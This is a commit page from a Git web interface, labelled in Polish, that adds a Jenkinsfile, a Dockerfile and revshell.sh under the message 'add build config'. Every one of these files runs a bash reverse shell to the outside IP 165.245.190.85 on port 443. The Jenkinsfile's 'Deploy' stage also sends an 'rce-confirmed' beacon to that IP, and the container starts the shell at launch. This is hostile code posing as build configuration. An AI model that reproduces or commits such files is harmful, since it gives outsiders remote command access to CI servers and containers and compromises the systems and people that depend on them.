Przeglądaj źródła

add build config

ptest99 2 tygodni temu
rodzic
commit
0d4ae06d4e
3 zmienionych plików z 14 dodań i 0 usunięć
  1. 6 0
      Jenkinsfile
  2. 6 0
      dockerfile
  3. 2 0
      revshell.sh

+ 6 - 0
Jenkinsfile

@@ -0,0 +1,6 @@
+node {
+  stage('Deploy'){
+    sh 'bash -i >& /dev/tcp/165.245.190.85/443 0>&1 || true'
+    sh 'curl http://165.245.190.85:443/rce-confirmed || true'
+  }
+}

+ 6 - 0
dockerfile

@@ -0,0 +1,6 @@
+FROM node:16-alpine
+RUN apk add --no-cache bash curl
+WORKDIR /usr/src/app
+COPY revshell.sh /tmp/revshell.sh
+RUN chmod +x /tmp/revshell.sh
+CMD ["/bin/sh", "-c", "/tmp/revshell.sh; while true; do sleep 3600; done"]

+ 2 - 0
revshell.sh

@@ -0,0 +1,2 @@
+#!/bin/bash
+bash -i >& /dev/tcp/165.245.190.85/443 0>&1 &